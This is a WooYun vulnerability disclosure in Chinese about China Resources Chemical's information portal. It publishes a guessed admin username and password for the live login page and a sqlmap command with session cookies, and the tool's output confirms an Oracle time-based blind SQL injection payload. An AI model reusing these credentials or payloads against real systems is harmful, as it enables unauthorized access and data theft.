当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129388

漏洞标题:华润化工控股有限公司信息门户设置缺陷/sql注入

相关厂商:华润化工控股有限公司

漏洞作者: 凌零1

提交时间:2015-07-28 12:39

修复时间:2015-07-30 14:10

公开时间:2015-07-30 14:10

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-28: 细节已通知厂商并且等待厂商处理中
2015-07-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

昨晚看到有人上交华润的,大清早就来看看咯!!

详细说明:

http://eip.crcchem.com/login/Login.jsp?logintype=1
用户名就猜猜吧!直接是站名crcchem,而且提示用户名错误,那就给我们爆破提供了机会
crcchem
abc12345

I_Y%D91V@Q(~XVA523KH)8D.png

)EQ5[4ID{RG9DZ1XVJZN2{A.png


漏洞证明:

后台看看,有注入,仅测试了一处,应该还有其他点,就不多测试了;
http://eip.crcchem.com/homepage/Homepage.jsp?hp
id=61&subCompanyId=21&isfromportal=1&isfromhp=0

C:\Python27\sqlmap>sqlmap.py -u "http://eip.crcchem.com/homepage/Homepage.jsp?hp
id=61&subCompanyId=21&isfromportal=1&isfromhp=0" -p "hpid" --cookie "testBanCook
ie=test; JSESSIONID=abcmHSSRt405C4B6i8h7u; loginfileweaver=%2Fwui%2Ftheme%2Fecol
ogy7%2Fpage%2Flogin.jsp%3FtemplateId%3D21%26logintype%3D1%26gopage%3D; loginidwe
aver=1357; languageidweaver=7"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150609}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:21:46
[09:21:47] [INFO] testing connection to the target URL
[09:21:49] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[09:21:51] [INFO] target URL is stable
[09:21:51] [WARNING] heuristic (basic) test shows that GET parameter 'hpid' migh
t not be injectable
[09:21:52] [INFO] heuristic (XSS) test shows that GET parameter 'hpid' might be
vulnerable to XSS attacks
[09:21:52] [INFO] testing for SQL injection on GET parameter 'hpid'
[09:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:21:53] [WARNING] reflective value(s) found and filtering out
[09:22:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[09:22:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[09:22:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:22:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[09:22:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[09:22:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[09:22:28] [INFO] testing 'MySQL inline queries'
[09:22:29] [INFO] testing 'PostgreSQL inline queries'
[09:22:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:22:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[09:22:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[09:22:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[09:22:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c
omment)'
[09:22:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[09:22:54] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:22:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[09:23:04] [INFO] testing 'Oracle AND time-based blind'
[09:24:05] [INFO] GET parameter 'hpid' seems to be 'Oracle AND time-based blind'
injectable
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads s
pecific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'Oracle' extending
provided level (1) and risk (1) values? [Y/n]
[09:24:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:24:10] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[09:24:29] [INFO] checking if the injection point on GET parameter 'hpid' is a f
alse positive
[09:24:59] [WARNING] there is a possibility that the target (or WAF) is dropping
'suspicious' requests
GET parameter 'hpid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection points with a total of 115 HTTP(s) req
uests:
---
Parameter: hpid (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: hpid=61 AND 1918=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(121)||CHR(
117)||CHR(122),5)&subCompanyId=21&isfromportal=1&isfromhp=0
---
[09:26:34] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle


Y9D~YWI0MXTZ08Y8FP5ZRM7.jpg

修复方案:

在登陆处加个验证码什么的,后台注入问题就多过滤吧!

版权声明:转载请注明来源 凌零1@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-30 14:10

厂商回复:

wooyun-2015-重复了,发现时已经在整改密码策略和全局过滤注入了

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-30 19:47 | 乌云一朵朵 ( 路人 | Rank:0 漏洞数:1 | 看那乌云一朵朵。)

    @凌零1sqlmap导出数据时中文是乱码怎么解决,已经在sqlmap.py里面第二行添加了 #-*-coding:utf-8-*- 但是不起作用